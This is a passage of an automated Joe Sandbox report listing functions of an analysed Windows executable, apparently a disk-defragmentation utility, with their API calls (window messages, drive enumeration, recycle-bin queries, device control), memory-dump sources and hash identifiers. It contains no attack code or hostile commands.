                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                                • Instruction ID: 84b8ef7fa6ef3b0704b7dcc146b1b846a3d4774a27478fb056f40241b994564c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46719C71A046049FC724EF64C884A6BB7E4FF88311F14896EFC4687352D775E849CBAA
                                                                                                                                                                                                                                                                                                Function 0042B060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • SHQueryRecycleBinW.SHELL32(?,?), ref: 0042B1A8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterQueryRecycleSection
                                                                                                                                                                                                                                                                                                • String ID: C:\$`=
                                                                                                                                                                                                                                                                                                • API String ID: 1132591718-3292444104
                                                                                                                                                                                                                                                                                                • Opcode ID: b5a03216ac4e2065a6f4eb8bc31d67b0b14f5ff9ba7124aef4ada714505d985d
                                                                                                                                                                                                                                                                                                • Instruction ID: acc36582b151d86fb2590580dfdaf1570fbc9ca1bde0f0bfc179c8702fc33688
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5a03216ac4e2065a6f4eb8bc31d67b0b14f5ff9ba7124aef4ada714505d985d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F716D71604351CFC720EF64D981BAFB7E4FF88354F41892EE89997250D734A944CBAA
                                                                                                                                                                                                                                                                                                Function 00456250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00456370
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?), ref: 004563C5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                • String ID: P
                                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3110715001
                                                                                                                                                                                                                                                                                                • Opcode ID: a03a8c6beb439d679fb0db97629ae7733890abcb9a7f1691b148e1a86304f56b
                                                                                                                                                                                                                                                                                                • Instruction ID: d9fc715740b337443135b9810308ba2b6a4282878f9a2242fee2fe4f623e65b9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a03a8c6beb439d679fb0db97629ae7733890abcb9a7f1691b148e1a86304f56b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6951A0716006119BC710DF68D88466AB7A4FF89715F514B2FED2487392CB78EC48CBDA
                                                                                                                                                                                                                                                                                                Function 00427220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • GetLogicalDrives.KERNEL32 ref: 00427273
                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004272D7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateCriticalDriveDrivesEnterInitializeInstanceLogicalSectionTypeUninitialize
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 2354564324-3404278061
                                                                                                                                                                                                                                                                                                • Opcode ID: 4c4e95195703de95fd7ffe35624b2a04eb654934d4a600d942b4dae5c314729d
                                                                                                                                                                                                                                                                                                • Instruction ID: c90efa92af71126dba6429048660511b38e7c0dbb77debf846213f4ca3b284e1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c4e95195703de95fd7ffe35624b2a04eb654934d4a600d942b4dae5c314729d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A518971A187519FC314DF29D881A5BBBE4FF88714F804A2EF899C7390D734A904CB8A
                                                                                                                                                                                                                                                                                                Function 0042F110 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041D750: #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Exclude,?,?,?,?,00427EC2,BB40E64E), ref: 0041D7DA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041D750: #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D807
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F1C6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                                • Opcode ID: 76ea21c8fa45cc5a0c53382b0db775d5b5275d38abb4e4b5e38ac425cd2fe3fe
                                                                                                                                                                                                                                                                                                • Instruction ID: 5b7d0dfdc37c6029d1809ee2af6bf9b154064672585324479e47d4ede9078e07
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76ea21c8fa45cc5a0c53382b0db775d5b5275d38abb4e4b5e38ac425cd2fe3fe
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9541A672B04310DBD310EF54E981B6BB7F4EB88714F91097EF945A7240D735AC488BAA
                                                                                                                                                                                                                                                                                                Function 0042D230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0042D31C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                                • Opcode ID: 4693b1930bf57ce9ef75d7503c8f5d038f37f734dc7154d68938e473202b5238
                                                                                                                                                                                                                                                                                                • Instruction ID: 93b085b09f2c4ac2bdbc263637bfa3f203d19d869e2dbc8046dfdb1fcf76ffa8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4693b1930bf57ce9ef75d7503c8f5d038f37f734dc7154d68938e473202b5238
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44311F35A00615CFC320DBB4E9C5A6BB7E0EB45311F5489AAE86ED2351DA34E8848B69
                                                                                                                                                                                                                                                                                                Function 00423020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,?,?), ref: 004230DC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                                • Opcode ID: fc5b2b4a0769cef6be2e786a124323a306287658ccb6bf050eb8b0b8ec3bf991
                                                                                                                                                                                                                                                                                                • Instruction ID: 16e62712f1819d0f9283694aa4ee6730415ba22870223c05465c6e43f049811c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc5b2b4a0769cef6be2e786a124323a306287658ccb6bf050eb8b0b8ec3bf991
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20214D75300A13AFC61CEB39D8998F9F3AAFF88305784422DE91A87251CB247D51CBD4
                                                                                                                                                                                                                                                                                                Function 00410390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 00410404
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$Button_Check
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1310182199
                                                                                                                                                                                                                                                                                                • Opcode ID: a42f14eec4e704c4dcdb54057e86be65e34abce19af7510991bb57dc56cb9c1c
                                                                                                                                                                                                                                                                                                • Instruction ID: 09b5b65d6a19d25cf5f991273958dae6b0a4a0afcd6ef2ce1ca3dc747381d305
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a42f14eec4e704c4dcdb54057e86be65e34abce19af7510991bb57dc56cb9c1c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3114F75200248AFCB30EF2ADC85AC933A4AB54314F11443FAD0DAB392DE79A9458B58
                                                                                                                                                                                                                                                                                                Function 0042F177 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F1C6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                                • Opcode ID: 79a77201152678a81144e55eba1330838be5272e1844f0c3915291d1357643a1
                                                                                                                                                                                                                                                                                                • Instruction ID: e2c7429d35eb79f017d7d9d53c2d9adddc48fbc63db9da39a1e6c1575c1991e3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79a77201152678a81144e55eba1330838be5272e1844f0c3915291d1357643a1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C01C835740321DBD7209F60DD81B2E77B07F48700FD1087AE905A7290D7B4BC448AAD
                                                                                                                                                                                                                                                                                                Function 0042D490 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D4B8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D4DD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: 29b101547385324777d1e1e58dcd704a1adca7d24db5bd4c7a528e124d161c24
                                                                                                                                                                                                                                                                                                • Instruction ID: ee58587f9df8cc875d776869306883827de9a08da503ac3836b7653e0a5f6a06
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29b101547385324777d1e1e58dcd704a1adca7d24db5bd4c7a528e124d161c24
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DF08972B4032036F53067B56D47F6B729C8B44B55F50056AF709DA1C1D9B4A80182AD
                                                                                                                                                                                                                                                                                                Function 00460070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(?,00090064,00000000,00000000,?), ref: 00460093
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004600C0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: JD
                                                                                                                                                                                                                                                                                                • API String ID: 9847766-1871045537
                                                                                                                                                                                                                                                                                                • Opcode ID: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                                • Instruction ID: b288529985f008a1a54ef72dbef53761962e394cc992aae83e13a0fae47ca317
